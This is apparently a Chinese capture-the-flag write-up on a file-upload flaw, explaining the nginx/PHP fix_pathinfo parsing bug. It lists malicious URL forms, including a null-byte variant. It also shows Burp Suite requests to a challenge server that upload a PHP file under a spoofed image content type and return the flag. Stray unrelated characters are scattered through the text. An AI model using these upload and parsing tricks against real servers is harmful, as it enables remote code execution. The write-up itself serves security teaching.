文件上傳漏洞是指用戶上傳了一個(gè)可執(zhí)行的腳本文件并通過(guò)此腳本文件獲得了執(zhí)行服務(wù)器端命令的能力掂僵，文件上傳本身沒(méi)有問(wèn)題豌熄，有問(wèn)題的是文件上傳后服務(wù)器怎么處理、解釋文件憨琳。應(yīng)用場(chǎng)景出口

對(duì)于文件上傳诫钓，有以下幾種解決思路:

• 上傳文件WEB腳本語(yǔ)言，服務(wù)器的WEB容器解釋并執(zhí)行了用戶上傳的腳本篙螟，導(dǎo)致代碼執(zhí)行菌湃；
• 上傳文件FLASH策略文件crossdomain.xml，以此來(lái)控制Flash在該域下的行為遍略；
• 上傳文件是病毒惧所、木馬文件，攻擊者用以誘騙用戶或管理員下載執(zhí)行绪杏；
• 上傳文件是釣魚(yú)圖片或?yàn)榘四_本的圖片下愈，某些瀏覽器會(huì)作為腳本執(zhí)行，實(shí)施釣魚(yú)或欺詐

Network preview:查看到場(chǎng)景服務(wù)器為 nginx

nginx.jpg

滲透思路：偽裝文件后綴,根據(jù)服務(wù)器漏洞解析

nginx漏洞原理
　Nginx默認(rèn)是以CGI的方式支持PHP解析的蕾久，普遍的做法是在Nginx配置文件中通過(guò)正則匹配設(shè)置SCRIPT_FILENAME势似。當(dāng)訪問(wèn)www.xx.com/phpinfo.jpg/1.php這個(gè)URL時(shí)，$fastcgi_script_name會(huì)被設(shè)置為“phpinfo.jpg/1.php”僧著，然后構(gòu)造成SCRIPT_FILENAME傳遞給PHP CGI叫编，但是PHP為什么會(huì)接受這樣的參數(shù)，并將phpinfo.jpg作為PHP文件解析呢?這就要說(shuō)到fix_pathinfo這個(gè)選項(xiàng)了霹抛。 如果開(kāi)啟了這個(gè)選項(xiàng)搓逾，那么就會(huì)觸發(fā)PHP中的如下邏輯：
PHP會(huì)認(rèn)為SCRIPT_FILENAME是phpinfo.jpg，而1.php是PATH_INFO杯拐，所以就會(huì)將phpinfo.jpg作為PHP文件來(lái)解析了

漏洞形式: www.xxxx.com/UploadFiles/image/1.jpg/1.php www.xxxx.com/UploadFiles/image/1.jpg%00.php www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php

實(shí)現(xiàn)漏洞:霞篡，修改文件為1.jpg.php,請(qǐng)求體Content-Type節(jié)設(shè)置為image/jpeg

在本地部署完burpsuite進(jìn)行滲透:Request部分

POST / HTTP/1.1
Host: 103.238.227.13:10085
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------31440985419813
Content-Length: 199
Referer: http://103.238.227.13:10085/
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------31440985419813
Content-Disposition: form-data; name="file"; filename="1.jpg.php"
Content-Type: image/jpeg

-----------------------------31440985419813--

獲得的Response請(qǐng)求體:

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Aug 2017 13:53:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.0.7
Content-Length: 15

é??????????????

咋一看最后一行像是flag世蔗，修改Request Accept-Charset節(jié),reonload

Request

POST / HTTP/1.1
Host: 103.238.227.13:10085
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------31440985419813
Content-Length: 208
Referer: http://103.238.227.13:10085/
Connection: Keep-Alive
Upgrade-Insecure-Requests: 1

-----------------------------31440985419813
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php
phpinfo();
?>
-----------------------------31440985419813--

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Aug 2017 14:32:49 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.0.7
Content-Length: 37

Flag:42e97d465f962c53df9549377b513c7e